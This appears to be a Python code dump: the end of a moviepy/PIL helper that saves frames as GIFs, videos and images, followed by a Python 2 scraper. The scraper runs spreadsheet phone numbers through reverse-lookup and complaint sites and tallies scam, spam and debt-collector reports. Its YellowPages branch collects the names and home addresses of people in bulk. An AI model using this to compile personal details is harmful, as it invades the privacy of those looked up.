filename: str,
extension: str = ".gif",
fps: int = 15,
):
"""
Args:
frames: A list of numpy arrays of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the video.
filename: File name.
extension: File extension.
fps: frames per second.
"""
if frames:
for f in range(len(frames)):
if np.issubdtype(frames[f].dtype, np.integer):
frames[f] = frames[f].astype(np.uint8)
elif np.issubdtype(frames[f].dtype, np.floating):
frames[f] = (frames[f] * 255).astype(np.uint8)
if frames[f].ndim == 2:
# consider as a grey scale image
frames[f] = np.repeat(frames[f][:, :, np.newaxis], 3, axis=2)
clip = mpy.ImageSequenceClip(frames, fps=fps)
if extension.lower() == ".gif":
clip.write_gif(
os.path.join(path, filename + extension),
fps=fps,
verbose=False,
logger=None,
)
else:
clip.write_videofile(
os.path.join(path, filename + extension),
fps=fps,
verbose=False,
logger=None,
)
clip.close()
def create_video_subproc(
frames: List[np.ndarray],
path: str,
filename: str,
extension: str = ".gif",
fps: int = 15,
daemon: bool = True,
):
"""
Create video with a subprocess, since it takes a lot of time for ``moviepy``
to encode the video file.
See Also:
:func:`.create_video`
Note:
if ``daemon`` is true, then this function cannot be used in a
daemonic subprocess.
Args:
frames: A list of numpy arrays of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the video.
filename: File name.
extension: File extension.
fps: frames per second.
daemon: Whether launching the saving process as a daemonic process.
Returns:
A wait function, once called, block until creation has finished.
"""
def wait():
pass
if frames:
p = get_context("spawn").Process(
target=create_video, args=(frames, path, filename, extension, fps)
)
p.daemon = daemon
p.start()
def wait():
p.join()
return wait
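# Editor's note: usage sketch for the wait-function pattern above (the output
# directory and frame contents are illustrative).
def _example_create_video_subproc(out_dir="."):
    frames = [np.random.rand(64, 64, 3) for _ in range(30)]   # float frames in [0, 1]
    wait = create_video_subproc(frames, out_dir, "demo", extension=".gif", fps=15)
    # ... do other work while the child process encodes ...
    wait()   # blocks until the gif has been written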
def numpy_array_to_pil_image(image: np.ndarray):
if np.issubdtype(image.dtype, np.integer):
image = image.astype(np.uint8)
elif np.issubdtype(image.dtype, np.floating):
image = (image * 255).astype(np.uint8)
if image.ndim == 2:
# consider as a grey scale image
image = np.repeat(image[:, :, np.newaxis], 3, axis=2)
image = Image.fromarray(image)
return image
def create_image(image: np.ndarray, path: str, filename: str, extension: str = ".png"):
"""
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the image.
filename: File name.
extension: File extension.
"""
image = numpy_array_to_pil_image(image)
image.save(os.path.join(path, filename + extension))
def create_image_subproc(
image: np.ndarray,
path: str,
filename: str,
extension: str = ".png",
daemon: bool = True,
):
"""
Create image with a subprocess.
See Also:
:func:`.create_image`
Note:
if ``daemon`` is true, then this function cannot be used in a
daemonic subprocess.
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the image.
filename: File name.
extension: File extension.
daemon: Whether launching the saving process as a daemonic process.
Returns:
A wait function, once called, block until creation has finished.
"""
p = get_context("spawn").Process(
target=create_image, args=(image, path, filename, extension)
)
p.daemon = daemon
p.start()
def wait():
p.join()
return wait
|
HairCut.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from bs4 import BeautifulSoup
from collections import defaultdict
from datetime import *
from dateutil.relativedelta import *
from Harvard import enumColumn
from os.path import join, dirname, abspath
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from shutil import copyfile
from shutil import move
from xlrd.sheet import ctype_text
import csv
import datetime
import glob
import itertools
import logging
import numpy as np
import os
import re
import requests
import selenium.webdriver.support.ui as ui
import sys
import threading
import time
import xlrd
import xlsxwriter
import xlwt
# Full Definitions
bbbEnd = '&locationText=&locationLatLng=&page=1'
bbbUrl = 'https://www.bbb.org/en/us/search?inputText='
bbbUrlAC = 'https://www.bbb.org/en/us/search?accreditedFilter=1&inputText='
breaker = 0
breakerLoop = 0
countitup = 1
dCount = 0
debtCount = 0
delMe = 0
done = False
hospitalCount = 0
lastComments = 0
locality = ""
now = datetime.datetime.now()
notNow = now - relativedelta(years=1)
numFormat = '3'
postal = ""
reset = 0
scamCount = 0
spamCount = 0
street = ""
# Get the people address.
def addressPeople(soup):
for elm in soup.select(".address"):
element = str(elm)
stopPoint = element.index('>')
address = element[stopPoint + 2:]
caret = address.index('<')
address = address[:caret]
address = " ".join(address.split())
worksheet.write(idx + 1, 3, address)
# Get the business address.
def addressBus(street, locality, postal, soup):
for elm in soup.select(".street-address"):
street = str(elm.text)
for elm in soup.select(".locality"):
locality = str(elm.text)
for elm in soup.select(".adr"):
postal = str(elm.text)
if street and locality and postal:
element = street + ", " + locality + postal[-5:]
worksheet.write(idx + 1, 7, element)
# Wait out my mistake.
def blocked(soup):
block = (soup.find(text=re.compile(r"has been blocked"))
         or soup.find(text=re.compile(r"returning an unknown error"))
         or soup.find(text=re.compile(r"Gateway time-out")))
if block is not None:
print("\n Ugh. I'm gonna go talk to the host of the site real quick. Should take an hour or two."
)
time.sleep(7200)
# Break if no chromedriver.
def breaker():
done = True
print("\nPlease refer to the Readme, you don't have chromedriver.exe anywhere!")
time.sleep(15)
sys.exit()
# Number of Entries
def businessEntries(soup):
noMatch = soup.find(text=re.compile(r"Showing"))
if noMatch is None:
howMany = soup.find_all('div', {'class': 'media-thumbnail'})
howLen = len(howMany)
worksheet.write(idx + 1, 4, howLen)
worksheet.write(idx + 1, 5, '1')
# Business Name
def businessName(soup):
for elm in soup.select(".info"):
element = str(elm)
stopPoint = element.index('span itemprop="name">')
busName = element[stopPoint:]
busName = busName[busName.index('>') + 1:busName.index('<')]
worksheet.write(idx + 1, 6, busName)
# Call Center
def callCenter(element):
global callNum
callNum = "0"
if "Call centre" in element:
stopPoint = element.index('Call centre')
callNum = element[stopPoint - 6:stopPoint - 2]
callNum = re.sub("[^0-9]", "", callNum)
worksheet.write(idx + 1, 4, callNum)
# Category None
def cateNone():
if all(value == "0" for value in cateTerms.values()):
sentiment = "No Categories"
worksheet.write(idx + 1, 14, sentiment)
# Category Listing
def categoryKiddo(soup):
for elm in soup.select(".categories"):
element = str(elm.text)
element = element.replace("Categories", "")
callCenter(element)
teleMarker(element)
serVice(element)
debtColl(element)
comPany(element)
scamCom(element)
unSol(element)
nuiCall(element)
nonProfit(element)
cateSet()
sentiment = max(cateTerms, key=lambda k: int(cateTerms[k]))  # counts are stored as digit strings
worksheet.write(idx + 1, 14, sentiment)
cateNone()
# Category Setter
def cateSet():
global cateTerms
cateTerms = {
'Call Center': callNum,
'Telemarketer': teleNum,
'Service Number': servNum,
'Debt Collector': debtNum,
'Company': compNum,
'Scam': scamNum,
'Unsolicited': unNum,
'Nuisance': nuiNum,
'Non-Profit': nonNum,
}
# Check the entry!
def checkMe(website):
    # 'd' is the debug choice and is resolved later in the main flow.
    if website == 'd':
        return website
    while website not in ['1', '2', '3', '4', '5', 'A']:
        print('Try Again.\n')
        website = raw_input('Input 1 for whoscall.in results, input 2 for BBB, input 3 for 800Notes, \ninput 4 for ShouldIAnswer, input 5 for YellowPages\n>')
        cleaner()
    return website
# Open chromedriver with options.
def chromeOpen(breaker):
    global driver
    locationString = None
    if os.path.isfile('chrome.ini'):
        # chrome.ini, when present, holds the path to chromedriver.exe
        ini = open('chrome.ini', 'r')
        locationString = ini.read().strip()
        ini.close()
    if os.path.exists(r"C:/chromedriver.exe"):
        locationString = r"C:/chromedriver.exe"
    elif os.path.isfile('chromedriver.exe'):
        locationString = 'chromedriver.exe'
    elif locationString is None:
        # No chromedriver found anywhere; breaker() explains and exits.
        breaker()
    driverOpen(webdriver, locationString)
# Clean the screen.
def cleaner():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
# Company Comments on Should I Answer
def comPany(element):
global compNum
compNum = "0"
if "Company" in element:
stopPoint = element.index('Company')
compNum = element[stopPoint - 6:stopPoint - 2]
compNum = re.sub("[^0-9]", "", compNum)
worksheet.write(idx + 1, 8, compNum)
# Compare Results for Maximum
def compareResults(scamCount, spamCount, column, debtCount):
global sentiment
searchTerms = {r"Scam": scamCount,
'Spam': spamCount,
'Debt Collector': debtCount,}
sentiment = max(searchTerms, key=searchTerms.get)
worksheet.write(idx + 1, column, sentiment)
# Debt Collector count for Should I Answer
def debtColl(element):
global debtNum
debtNum = "0"
if "Debt collector" in element:
stopPoint = element.index('Debt collector')
debtNum = element[stopPoint - 6:stopPoint - 2]
debtNum = re.sub("[^0-9]", "", debtNum)
worksheet.write(idx + 1, 7, debtNum)
# DriverOpen
def driverOpen(webdriver, locationString=None):
    global driver
    # Use an explicit chromedriver path when one was located (Selenium 3 API).
    if locationString:
        driver = webdriver.Chrome(executable_path=locationString)
    else:
        driver = webdriver.Chrome()
    driver.set_window_position(4000, 651)
# EqualBoy - Are these Equal?
def EqualBoy(scamCount, spamCount, debtCount, worksheet):
if(scamCount == spamCount == debtCount):
worksheet.write(idx + 1, 7, "Equal")
# Search for latest date.
def lastDate(soup):
for elm in soup.select(".oos_contletList time"):
worksheet.write(idx + 1, 9, str(elm.text))
element = str(elm.text)
if "ago" in element:
worksheet.write(idx + 1, 9, now.strftime("%d %b %Y"))
# How many of these were posted in the last year?
def lastYear(lastComments, reset, soup, worksheet):
for elm in soup.select(".oos_contletList time"):
element = str(elm.text)
if reset == 1:
lastComments = 0
if "ago" in element:
commentTime = now.strftime("%d %b %Y")
commentTime = now.strptime(commentTime, "%d %b %Y")
else:
commentTime = now.strptime(elm.text, "%d %b %Y")
if commentTime > notNow:
lastComments += 1
worksheet.write(idx + 1, 10, lastComments)
# Loading Animation that plays when the user is running a file.
def loading():
for s in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading ' + s)
sys.stdout.flush()
time.sleep(0.1)
# Negative Boy
def negativeBoy(element):
global negNumbers
negNumbers = "0"
if "negative" in element:
stopPoint = element.index('negative')
negNumbers = element[stopPoint - 6:stopPoint - 2]
negNumbers = re.sub("[^0-9]", "", negNumbers)
worksheet.write(idx + 1, 1, negNumbers)
# Neutral Boy
def neutralBoy(element):
global neuNumbers
neuNumbers = "0"
if "neutral" in element:
stopPoint = element.index('neutral')
neuNumbers = element[stopPoint - 6:stopPoint - 2]
neuNumbers = re.sub("[^0-9]", "", neuNumbers)
worksheet.write(idx + 1, 2, neuNumbers)
# No Boys
def NoBoys(scamCount, spamCount, debtCount, worksheet):
if(scamCount == 0 and spamCount == 0 and debtCount == 0):
worksheet.write(idx + 1, 7, "No Entries Detected")
# Non Profit ShouldIAnswer
def nonProfit(element):
global nonNum
nonNum = "0"
if "Non-profit Organization" in element:
stopPoint = element.index('Non-profit Organization')
nonNum = element[stopPoint - 6:stopPoint - 2]
nonNum = re.sub("[^0-9]", "", nonNum)
worksheet.write(idx + 1, 12, nonNum)
# Nuisance Caller ShouldIAnswer
def nuiCall(element):
global nuiNum
nuiNum = "0"
if "Nuisance call" in element:
stopPoint = element.index('Nuisance call')
nuiNum = element[stopPoint - 6:stopPoint - 2]
nuiNum = re.sub("[^0-9]", "", nuiNum)
worksheet.write(idx + 1, 11, nuiNum)
# Number of Pages
def peoplePages(soup):
for elm in soup.select(".result-top-left-detail"):
element = str(elm)
stopPoint = element.index('Showing')
pageNum = element[stopPoint + 18:]
caret = pageNum.index('<')
pageNum = pageNum[:caret]
pageNum = re.sub("[^0-9]", "", pageNum)
worksheet.write(idx + 1, 1, pageNum)
# Person Name Get!
def personName(soup):
for elm in soup.select(".result-left"):
element = str(elm)
stopPoint = element.index('sbp')
perName = element[stopPoint + 5:]
caret = perName.index('<')
perName = perName[:caret]
worksheet.write(idx + 1, 2, perName)
# Positive Boy
def positiveBoy(element):
global posNumbers
posNumbers = "0"
if "positive" in element:
stopPoint = element.index('positive')
posNumbers = element[stopPoint - 6:stopPoint - 2]
posNumbers = re.sub("[^0-9]", "", posNumbers)
worksheet.write(idx + 1, 3, posNumbers)
# PrepareCSV preps a CSV for EXCELence
def PrepareCSV(preName, fileName):
global fname
global totalName
totalName = preName + '.xlsx'
excelFile = xlsxwriter.Workbook(totalName)
worksheet = excelFile.add_worksheet()
enumColumn(fileName, worksheet)
excelFile.close()
fname = join(dirname(abspath('__file__')), '%s' % totalName)
print('Temporary Convert to xlsx done.\n')
# Ratings Board - Majority of ShouldIAnswer
def ratingsKiddo(soup):
for elm in soup.select(".ratings"):
element = str(elm.text)
element = element.replace("Ratings", "")
negativeBoy(element)
neutralBoy(element)
positiveBoy(element)
shouldTerm()
sentiment = max(shouldTerms, key=shouldTerms.get)
worksheet.write(idx + 1, 13, sentiment)
# ScamSpam
def ScamSpam(scamCount, spamCount, worksheet):
if(scamCount == spamCount):
worksheet.write(idx + 1, 7, "Scam/Spam")
# Scam Com
def scamCom(element):
global scamNum
scamNum = "0"
if "Scam call" in element:
stopPoint = element.index('Scam call')
scamNum = element[stopPoint - 6:stopPoint - 2]
scamNum = re.sub("[^0-9]", "", scamNum)
worksheet.write(idx + 1, 9, scamNum)
# ScamDebt
def ScamDebt(scamCount, debtCount, worksheet):
if(scamCount == debtCount):
worksheet.write(idx + 1, 7, "Scam/Debt")
# Service Comments on Should I Answer
def serVice(element):
global servNum
servNum = "0"
if "Service" in element:
stopPoint = element.index('Service')
servNum = element[stopPoint - 6:stopPoint - 2]
servNum = re.sub("[^0-9]", "", servNum)
worksheet.write(idx + 1, 6, servNum)
# shouldTerms
def shouldTerm():
global shouldTerms
shouldTerms = {
r"Positive": int(posNumbers),
'Neutral': int(neuNumbers),
'Negative': int(negNumbers),
}
# SpamDebt
def SpamDebt(spamCount, debtCount, worksheet):
if(spamCount == debtCount):
worksheet.write(idx + 1, 7, "Spam/Debt")
# Telemarketer Should I Answer Listings
def teleMarker(element):
global teleNum
teleNum = "0"
if "Telemarketer" in element:
stopPoint = element.index('Telemarketer')
teleNum = element[stopPoint - 6:stopPoint - 2]
teleNum = re.sub("[^0-9]", "", teleNum)
worksheet.write(idx + 1, 5, teleNum)
# TimeoutHandler that takes care of webDriver fails.
def TimeOutHandler(driver, webdriver, worksheet):
    global breakerLoop
    driver.close()
    worksheet.write(idx + 1, 7, 'Timeout Exception')
    breakerLoop = 1
# Unsolicited Call handling
def unSol(element):
global unNum
unNum = "0"
if "Unsolicited call" in element:
stopPoint = element.index('Unsolicited call')
unNum = element[stopPoint - 6:stopPoint - 2]
unNum = re.sub("[^0-9]", "", unNum)
worksheet.write(idx + 1, 10, unNum)
# Create a UTF-8 Workbook.
book = xlwt.Workbook(encoding='utf-8')
# Assign a User-Agent to python.
headers = {'User-Agent': 'Chrome/39.0.2171.95 Safari/537.36 AppleWebKit/537.36 (KHTML, like Gecko)'}
# Create a worksheet named "Results".
worksheet = book.add_sheet('Results', cell_overwrite_ok=True)
# Join the dragged files to create strings.
dragNDrop = ''.join(sys.argv[1:2])
dragNDrop2 = ''.join(sys.argv[2:3])
# Was a file dragged onto the Batch file?
# If not the string "dragNDrop" will be empty and the user will be prompted.
if dragNDrop == '':
fileName = raw_input('''
Input the file with extension
>''')
else:
# Obtain the fileName only by removing the directory name.
fileOnly = dragNDrop.rfind('\\') + 1
fileName = dragNDrop[fileOnly:]
# Was a site given in the Batch file?
# If not the string "dragNDrop2" will be empty and the user will be prompted.
if dragNDrop2 == '':
website = raw_input(
'Input 1 for whoscall.in results, input 2 for BBB, input 3 for 800Notes, \ninput 4 for ShouldIAnswer, input 5 for YellowPages\n>')
else:
website = dragNDrop2
# No more bad inputs!
website = checkMe(website)
# Find the period in the file, which determines the prepRev or extension, and the fileName.
stopPoint = fileName.index('.')
prepRev = fileName[stopPoint:]
preName = fileName[:stopPoint]
nestedName = "WorkingDir/" + preName + "/" + preName
# Make sure we're still encoding in UTF. Don't want any mistakes now, do we?
reload(sys)
sys.setdefaultencoding('utf')
# Is the extension CSV? If so we'll convert it to xlsx.
if prepRev == '.csv':
PrepareCSV(preName, fileName)
# Get ready for XLRD to parse the original file (or the converted one).
try:
fname
except NameError:
fname = join(dirname(abspath('__file__')), '%s' % fileName)
# Parse it XLRD!
xl_workbook = xlrd.open_workbook(fname)
sheet_names = xl_workbook.sheet_names()
xl_sheet = xl_workbook.sheet_by_name(sheet_names[0])
# If the user types "d" for the website choice, they will be prompted again, but, this time given debug info.
if website == 'd':
cleaner()
website = raw_input('Input 1 for whoscall.in results, input 2 for BBB, input 3 for 800Notes, \ninput 4 for ShouldIAnswer, input 5 for YellowPages\n>')
checkMe(website=website)
logging.basicConfig(level=logging.DEBUG)
logging.debug('Only shown in debug mode')
# Start the little spinny animation.
g = threading.Thread(target=loading)
g.start()
stopPoint = fileName.index('.')
# From here on prepRev holds the base name (the extension handling above is already done).
prepRev = fileName[0:stopPoint]
if website == '1':
totalName = prepRev + '_rev_who.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, '# of Messages')
worksheet.write(0, 2, 'Does it Appear?')
worksheet.write(0, 3, 'Number of Scammers')
worksheet.write(0, 4, 'Number of Spammers')
worksheet.write(0, 5, 'Number of Debt Collectors')
worksheet.write(0, 6, 'Number of Hospital')
worksheet.write(0, 7, 'Sentiment')
siteType = '_rev_who.xlsx'
if website == '2':
chromeOpen(breaker)
driver.set_page_load_timeout(600)
totalName = prepRev + '_rev_BBB.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Accredited')
siteType = '_rev_BBB.xlsx'
if website == '3':
chromeOpen(breaker)
driver.set_page_load_timeout(600)
totalName = prepRev + '_rev_800notes.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Approximate Number of Messages')
worksheet.write(0, 2, 'Number of Pages')
worksheet.write(0, 3, 'Number of Scammers')
worksheet.write(0, 4, 'Number of Spammers')
worksheet.write(0, 5, 'Number of Debt Collectors')
worksheet.write(0, 6, 'Number of Hospital')
worksheet.write(0, 7, 'Sentiment')
worksheet.write(0, 8, 'Last Year')
worksheet.write(0, 9, 'Last Date of Comment')
worksheet.write(0, 10, 'Number of Comments in the Last Year')
siteType = '_rev_800notes.xlsx'
if website == '4':
chromeOpen(breaker)
driver.set_page_load_timeout(600)
totalName = prepRev + '_rev_ShouldI.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Negative Reviews')
worksheet.write(0, 2, 'Neutral Reviews')
worksheet.write(0, 3, 'Positive Reviews')
worksheet.write(0, 4, 'Number of Call Center Comments')
worksheet.write(0, 5, 'Number of Telemarketer Comments')
worksheet.write(0, 6, 'Number of Service Comments')
worksheet.write(0, 7, 'Number of Debt Collector Comments')
worksheet.write(0, 8, 'Number of Company Comments')
worksheet.write(0, 9, 'Number of Scam Comments')
worksheet.write(0, 10, 'Number of Unsolicited Comments')
worksheet.write(0, 11, 'Number of Nuisance Call Comments')
worksheet.write(0, 12, 'Number of Non-Profit Comments')
worksheet.write(0, 13, 'Sentiment')
worksheet.write(0, 14, 'Category Sentiment')
siteType = '_rev_ShouldI.xlsx'
if website == '5':
chromeOpen(breaker)
driver.set_page_load_timeout(600)
totalName = prepRev + '_rev_YellowPages.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Number of Pages - People')
worksheet.write(0, 2, 'Name of Person')
worksheet.write(0, 3, 'Address - People')
worksheet.write(0, 4, 'Number of Listings - Business')
worksheet.write(0, 5, 'Number of Pages - Business')
worksheet.write(0, 6, 'Name of Business')
worksheet.write(0, 7, 'Address - Business')
siteType = '_rev_YellowPages.xlsx'
if website == 'A':
totalName = prepRev + '_rev_Reviewnotes.xlsx'
workbook = xlsxwriter.Workbook(totalName)
worksheet = workbook.add_worksheet()
worksheet.write(0, 0, 'Telephone Number')
worksheet.write(0, 1, 'Review Note')
siteType = '_rev_Reviewnotes.xlsx'
# Set column to A:A, the first column.
worksheet.set_column('A:A', 13)
# Read the slice from the first cell to the last accessible row in Excel.
col = xl_sheet.col_slice(0, 1, 1048576)
# Read each string line by line.
for (idx, cell_obj) in enumerate(col):
cell_type_str = ctype_text.get(cell_obj.ctype, 'unknown type')
cell_obj_str = str(cell_obj)
# Cut the numbers to their appropriate format.
# Does a dash, parenthesis, or none of those exist? That will decide the numFormat.
if '-' in cell_obj_str:
firstStart = cell_obj_str.index('-') - 3
firstEnd = firstStart + 3
secondStart = cell_obj_str.index('-') + 1
secondEnd = secondStart + 3
thirdStart = cell_obj_str.index('-') + 5
thirdEnd = thirdStart + 4
teleWho = cell_obj_str[firstStart:firstEnd] + cell_obj_str[secondStart:secondEnd] + cell_obj_str[thirdStart:thirdEnd]
teleBBB = cell_obj_str[firstStart:firstEnd] + cell_obj_str[secondStart:secondEnd] + cell_obj_str[thirdStart:thirdEnd]
tele800 = '1-' + cell_obj_str[firstStart:firstEnd] + '-' + cell_obj_str[secondStart:secondEnd] + '-' + cell_obj_str[thirdStart:thirdEnd]
elif '(' in cell_obj_str:
firstStart = cell_obj_str.index('(') + 1
firstEnd = firstStart + 3
secondStart = cell_obj_str.index(' ') + 1
secondEnd = secondStart + 3
thirdStart = cell_obj_str.index('-') + 1
thirdEnd = thirdStart + 4
teleWho = cell_obj_str[firstStart:firstEnd] + cell_obj_str[secondStart:secondEnd] + cell_obj_str[thirdStart:thirdEnd]
teleBBB = cell_obj_str[firstStart:firstEnd] + cell_obj_str[secondStart:secondEnd] + cell_obj_str[thirdStart:thirdEnd]
tele800 = '1-' + cell_obj_str[firstStart:firstEnd] + '-' + cell_obj_str[secondStart:secondEnd] + '-' + cell_obj_str[thirdStart:thirdEnd]
else:
teleWho = cell_obj_str[8:11] + cell_obj_str[11:14] + cell_obj_str[14:18]
teleBBB = cell_obj_str[8:11] + cell_obj_str[11:14] + cell_obj_str[14:18]
tele800 = '1-' + cell_obj_str[8:11] + '-' + cell_obj_str[11:14] + '-' + cell_obj_str[14:18]
worksheet.write(idx + 1, 0, '1' + teleWho)
# WhosCallin Scrapes using the python Requests library. Nice and clean.
if website == '1':
reqInput = 'http://whoscall.in/1/%s/' % teleWho
time.sleep(1)
requestRec = requests.get(reqInput)
soup = BeautifulSoup(requestRec.content, 'lxml')
noMatch = soup.find(text=re.compile(r"no reports yet on the phone number"))
type(noMatch) is str
if noMatch is None:
worksheet.write(idx + 1, 2, 'Got a hit')
# Check for number of comments.
howMany = soup.find_all('img', {'src': '/default-avatar.gif'})
howManyAreThere = len(howMany)
worksheet.write(idx + 1, 1, howManyAreThere)
# Search for text on the sites that indicates their sentiment and generate the top response.
scamNum = [div for div in soup.find_all('div', {'style': 'font-size:14px; margin:10px; overflow:hidden'})
if 'scam' in div.text.lower()]
scamCount = len(scamNum)
spamNum = [div for div in soup.find_all('div', {'style': 'font-size:14px; margin:10px; overflow:hidden'})
if 'spam' in div.text.lower()]
spamCount = len(spamNum)
debtNum = [div for div in soup.find_all('div', {'style': 'font-size:14px; margin:10px; overflow:hidden'})
if 'debt' in div.text.lower() or 'credit' in div.text.lower()]
debtCount = len(debtNum)
hospitalNum = [div for div in soup.find_all('div', {'style': 'font-size:14px; margin:10px; overflow:hidden'})
if 'hospital' in div.text.lower() or 'medical' in div.text.lower()]
hospitalCount = len(hospitalNum)
worksheet.write(idx + 1, 3, scamCount)
worksheet.write(idx + 1, 4, spamCount)
worksheet.write(idx + 1, 5, debtCount)
worksheet.write(idx + 1, 6, hospitalCount)
# Hospitals are important to look at, so I boost them.
compareResults(scamCount, spamCount, 7, debtCount)
NoBoys(scamCount, spamCount, debtCount, worksheet)
EqualBoy(scamCount, spamCount, debtCount, worksheet)
ScamSpam(scamCount, spamCount, worksheet)
ScamDebt(scamCount, debtCount, worksheet)
SpamDebt(spamCount, debtCount, worksheet)
if(hospitalCount > 0):
worksheet.write(idx + 1, 7, "Hospital")
# BBB, the beginning!
if website == '2':
# Selenium, get that site for me! (bbbUrl + bbbEnd are defined above)
driver.get(bbbUrl + teleBBB + bbbEnd)
time.sleep(1)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
Hit = soup.find_all('aside', {'class': 'search-result__aside'})
# Cloned the previous section, but, with changes to the URL via bbbUrlAC.
driver.get(bbbUrlAC + teleBBB + bbbEnd)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
Badge = soup.find_all('aside', {'class': 'search-result__aside'})
if len(Hit) != 0:
worksheet.write(idx + 1, 1, 'Got a Hit')
if len(Badge) != 0:
worksheet.write(idx + 1, 1, 'Is Accredited')
# 800Notes, the big one.
if website == '3':
try:
driver.get('http://800notes.com/Phone.aspx/%s' % tele800)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
time.sleep(2)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
# This entry doesn't exist if this regex succeeds.
noMatch = soup.find(text=re.compile(r"Report the call using the form"))
soup.prettify()
type(noMatch) is str
# Make sure we don't get blocked, and if we do, wait it out.
blocked(soup)
worksheet.write(idx + 1, 8, '|X|')
if noMatch is None and breakerLoop == 0:
try:
driver.get('http://800notes.com/Phone.aspx/%s/10000' % tele800)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
blocked(soup)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
curSite = driver.current_url
pageExist = soup.find('a', class_='oos_i_thumbDown')
type(pageExist) is str
if pageExist is not None:
if curSite.count('/') > 4:
curBegin = curSite.rfind('/') + 1
curEnd = curBegin + 4
pageNum = curSite[curBegin:curEnd]
else:
pageNum = 1
numMessages = int(pageNum) - 1
twentyNums = numMessages * 20
thumbs = soup.find_all('a', {'class': 'oos_i_thumbDown'})
thumbPlus = len(thumbs) + int(twentyNums)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
lastDate(soup)
time.sleep(2)
if pageExist is not None and breakerLoop == 0:
while int(countitup) != int(pageNum) + 1:
try:
if countitup == 1:
driver.get('http://800notes.com/Phone.aspx/{}'.format(tele800))
else:
driver.get('http://800notes.com/Phone.aspx/{}/{}/'.format(tele800, countitup))
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
lastYear(lastComments, reset, soup, worksheet)
reset = 0
countitup = int(countitup) + 1
if countitup % 2 == 0:
time.sleep(5)
else:
time.sleep(4)
scamNum = soup.find_all('div',
class_='oos_contletBody',
text=re.compile(r"Scam",
flags=re.IGNORECASE))
spamNum = soup.find_all(text=re.compile(r"Call type: Telemarketer"))
debtNum = soup.find_all(text=re.compile(r"Call type: Debt collector"))
hospitalNum = soup.find_all('div',
class_='oos_contletBody',
text=re.compile(r"Hospital",
flags=re.IGNORECASE))
scamCount += len(scamNum)
spamCount += len(spamNum)
debtCount += len(debtNum)
hospitalCount += len(hospitalNum)
blocked(soup)
reset = 1
worksheet.write(idx + 1, 1, thumbPlus)
worksheet.write(idx + 1, 3, scamCount)
worksheet.write(idx + 1, 4, spamCount)
worksheet.write(idx + 1, 5, debtCount)
worksheet.write(idx + 1, 6, hospitalCount)
compareResults(scamCount, spamCount, 7, debtCount)
NoBoys(scamCount, spamCount, debtCount, worksheet)
EqualBoy(scamCount, spamCount, debtCount, worksheet)
if(sentiment == "Scam" or sentiment == "Spam"):
ScamSpam(scamCount, spamCount, worksheet)
if(sentiment == "Scam" or sentiment == "Debt Collector"):
ScamDebt(scamCount, debtCount, worksheet)
if(sentiment == "Spam" or sentiment == "Debt Collector"):
SpamDebt(spamCount, debtCount, worksheet)
if(hospitalCount > 0):
worksheet.write(idx + 1, 7, "Hospital")
countitup = 1
debtCount = 0
hospitalCount = 0
scamCount = 0
spamCount = 0
worksheet.write(idx + 1, 2, int(pageNum))
# ShouldIAnswer, Community Requested.
if website == '4':
try:
driver.get(
'https://www.shouldianswer.com/phone-number/%s' % teleBBB)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
time.sleep(20)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
# This entry doesn't exist if this regex succeeds.
noMatch = soup.find(text=re.compile(r"PAGE NOT FOUND"))
soup.prettify()
type(noMatch) is str
# Make sure we don't get blocked, and if we do, wait it out.
blocked(soup)
if noMatch is None:
ratingsKiddo(soup)
categoryKiddo(soup)
if website == '5':
try:
driver.get('https://people.yellowpages.com/reversephonelookup?phone=%s&site=79' % teleBBB)
except TimeoutException, ex:
TimeOutHandler(driver=driver,
worksheet=worksheet,
webdriver=webdriver)
driverOpen(webdriver)
time.sleep(5)
requestRec = driver.page_source
soup = BeautifulSoup(requestRec, 'lxml')
# This entry doesn't exist if this regex succeeds.
noMatch = soup.find(text=re.compile(r"didn't find any results for"))
soup.prettify()
type(noMatch) is str
# Make sure we don't get blocked, and if we do, wait it out.
blocked(soup)
if noMatch is None:
peoplePages(soup)
personName(soup)
